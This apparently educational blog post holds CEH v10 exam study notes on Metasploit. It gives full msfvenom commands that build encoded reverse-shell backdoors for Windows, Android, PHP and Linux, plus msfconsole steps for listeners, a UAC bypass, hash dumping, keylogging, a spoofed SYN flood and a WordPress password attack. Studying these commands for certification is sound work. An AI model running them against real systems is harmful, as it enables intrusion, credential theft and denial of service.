Metasploit Framework in CEH Exam

This post explain what is Metasploit Framework and its uses regarding Certificated Ethical Hacker (CEH) Exam. It is not intented to be an overall review of the tool.

It is focused on CEH v10.

What is Metasploit Framework?

Metasploit Framework (usually abbreviated as msf) is an open-source tool for developing and executing exploit code against a remote target machine.

The creator of Metasploit is HD Moore. You can find more info about him at his personal site or his Mastodon or Twitter accounts.

Jack Rhysider’s Darknet Diaries podcast made an interview to HD Moore, that covers the history of early Metasploit. You can listen to (or read) episode 114 “HD” on Darknet Diaries’ websiteSpotify or Apple Podcasts.

Metasploit applications

Metasploit Framework consists of a series of applications. The ones used on CEH are:

  1. msfdb: manages the Metasploit framework database
  2. msfvenom: tool to create trojans.
  3. msfconsole: tool to execute exploit.

from Linux terminal opens metasploit framework.

msfdb

msfdb init

Starts Metasploit database. Before you need to have started database (for example, service postgresql start)

You may need to restart database after this (e.g. service postgresql restart). Maybe you also need to start database before this (service postgresql start).

msfvenom

msfvenom -l

List you all the available exploits in the database.

parameters

-p: Payload. Value example: windows/meterpreter/reverse_tcp
–platform: Platform. Value example: Windows
-a: Arch. Example: x86
-e: Encoder. Value example: x86/shikata_ga_nai
-b: Characters to ignore. Value exampe: “\x00” (including quotes)
LHOST=: value for local host. Example: LHOST=10.10.10.10

LPORT=: value for local port. Example: LPORT=444
-f: format of output. Example: exe , or elf
>: path for output. Example: Desktop/Backdoor.exe

-o: also path for output

Payloads

windows/meterpreter/reverse_tcp

Used to connect to remote Windows machines.

php/meterpreter/reverse_tcp

Generates a PHP file. It must be copied to a text file and saved and PHP. Then you must try to run it on a web server

android/meterpreter/reverse_tcp

Generate an apk file for Android.

linux/x86/shell/reverse_tcp

Generate file for Linux

Examples

msfvenom -p windows/meterpreter/reverse_tcp –platform windows -a x86 -e x86/shikata_ga_nai -b “\x00” LHOST=10.10.10.11 -f exe > Desktop/Backdoor.exe

msfvenom -p windows/meterpreter/reverse_tcp –platform windows -a x86 -f exe LHOST=10.10.10.11 LPORT=444 -o /root/Desktop/Test.exe

msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.10.11 lport=4444 -f raw [generates a file]

msfvenom -p android/meterpreter/reverse_tcp –platform android -a dalvik LHOST=10.10.10.11 R > Desktop/Backdoor.apk

msfvenom -p linux/x86/shell/reverse_tcp LHOST=10.10.10.11 LPORT=4444 –platform linux -f elf > /root/Desktop/exploit.elf

msfconsole

msfconsole commands

hosts

Displays hosts on subnetwork.

services

Displays services on active hosts.

db_status

Checks db status. If database is not connected, maybe you need to initialize it.

If message is success (e.g., postgresql connected to msf), everything is correct.

If it is not correct, you may need to run msfdb correctly.

db_import <filename>

Imports a file in msf database to local disk.

nmap

Calls nmap command.

db_nmap

I do not know the difference between nmap and db_nmap. If you know the difference, please add a comment.

use <module name with path>

Enters to a msf module. Value example: scanner/smb/smb_version

show auxiliary

Lists the available auxiliary tools.

show exploits

Lists the available exploits.

show payloads

Lists the available payloads.

background

Sets a multi/handler session to background and goes back to msf shell.

Auxiliary modules

auxiliary/scanner/smb/smb_version

SMB scanner module scanner/smb/smb_version to get OS flavour.

Seen on CEHv10, mod. 2, ex. 5.

show options

set RHOSTS 10.10.10.8-16

set THREADS 100

run

auxiliary/scanner/snmp/snmp_login

Seen on CEHv10, mod. 4, ex. 9.

set RHOSTS 10.10.10.12

exploit

auxiliary/scanner/snmp/snmp_enum

Seen on CEHv10, mod. 4, ex. 9.
set RHOSTS 10.10.10.12
exploit

Exploit modules

exploit/multi/handler

Seen on CEHv10, mod. 5, ex. 4 "Exploiting Client Side Vulnerabilities and Establishing a VNC"
set payload windows/meterpreter/reverse_tcp
Sets payload.
set LHOST 10.10.10.11
Set local host.

Set LPORT <port number>

For example, 4444
exploit -j -z
Exploit. -j means that it is run in background with one or more session. -z is the same, but just with one session. I ignore what it means when both are executed.
Then we must wait until a connection appears, it means, a compromised computer executes the corresponding payload executable created with msfvenom.
sessions -i 1
Selects session 1. Example: sessions -i 1
ps
See processes.

getuid
Get remote machine username.

whoami

Displays current user.

sysinfo

Get system info.

getsystem -t 1

Escalate priviledges. If it does not work, you can try exploit/windows/local/bypassuac/fodhelper.

pwd

Displays current path.

ifconfig

Check IP.
timestomp secret.txt -v

Displays the created time, accessed time, modified time, and entry modified time]
download <filename>

Download file from remote folder to local Home folder.  Example: download bootmgr

search -f “filename.ext”

Search for a file.
keyscan_start

Captures all keyboard input from the victim system.
keyscan_dump

View captured keyboard input.
idletime

Display idletime in seconds.
shutdown

Shutdowns computer.

execute -f cmd.exe -c -H , and then, shell

Executes Windows shell in remote computer.

exploit/windows/local/bypassuac_fodhelper

It is used once a connection has been established with exploit/multi/handler. It allows getsystem command to succeed.

Seen on CEHv10, mod. 5, ex. 5. “Escalating Privileges by Exploiting Client Side Vulnerabilities”

It is used to escalate privileges.
show options
Display all options related to module.
set SESSION <session number>
Select the opene session with exploit/multi/handler. Example: set SESSION 1
set payload windows/meterpreter/reverse_tcp
show options
set LHOST 10.10.10.11
set TARGET 0
Sets exploit target id.
exploit
Runs exploit. If it is successful, it allows to escalates privileges by running getsystem.
run post/windows/gather/smart_hashdump
Dumps Windows hash.

auxiliary/dos/tcp/synflood

Performs a SYN flood on objective. Seen in module 10, lab/exercise 1.

set RHOST [IP Address of Windows 10] and press Enter

Type set RPORT 21 and press Enter

Type set SHOST [IP Address of Windows Server 2016] and press Enter [set spoofable IP address]

Type set TIMEOUT 20000 [number of seconds to wait for new data]

auxiliary/scanner/http/wordpress_login_enum

This module is used to perform a dictionary attack against a WordPress web.

Featured in module 14, exercise 2.

show options

Display options.

set PASS_FILE /root/Desktop/Wordlists/Passwords.txt

Set file containing the passwords to perform dictionary attack.
set RHOSTS [IP Address of Windows Server 2012]

Enter to set the target IP Address, e.g., Windows Server 2012 IP Address.
set RPORT 8080

Enter to set the target machine port, e.g., Windows Server 2012 port.
set TARGETURI http://[IP Address of Windows Server 2012]:8080/CEH/

Set the base path to the WordPress website, e.g., http://[IP Address of Windows Server 2012]:8080/CEH/.
set USERNAME admin

Set the username to try to crack.
run

Run exploit. You must search among all the results and look for the lines marked in green.

CEHv10 exercises where Metasploit Framework is featured

  • Mod. 2 “Information Gathering”
    • Ex. 5 “Information gathering using Metasploit”
  • Mod. 4 “Enumeration”
    • Ex. 9 “SNMP Enumeration Using snmp_enum”
  • Mod. 6 “System Hacking”
    • Ex. 4 “Exploiting Client Side Vulnerabilities and Establishing a VNC”
    • Ex. 5. “Escalating Privileges by Exploiting Client Side Vulnerabilities”
    • Ex. 6. “Hacking Windows 10 using Metasploit, and Post-Exploitation Using Meterpreter”
  • Mod. 12
    • Ex. 5 “Bypassing Windows Firewall using Metasploit”
  • Mod. 14
    • Ex. 2 “Enumerating and Hacking a Web Application Using WPScan and Metasploit”
    • Ex. 6 “Exploiting File Upload Vulnerability at Different Security Levels”
  • Mod. 17 “Hacking Mobile Platforms”
    • Ex. 1 “Creating Binary Payloads using Kali Linux to Hack Android”
  • Mod. 19
    • Ex. 3 “Bypassing ownCloud Antivirus and Hacking the Host using Kali Linux”

Leave a Reply

Your email address will not be published. Required fields are marked *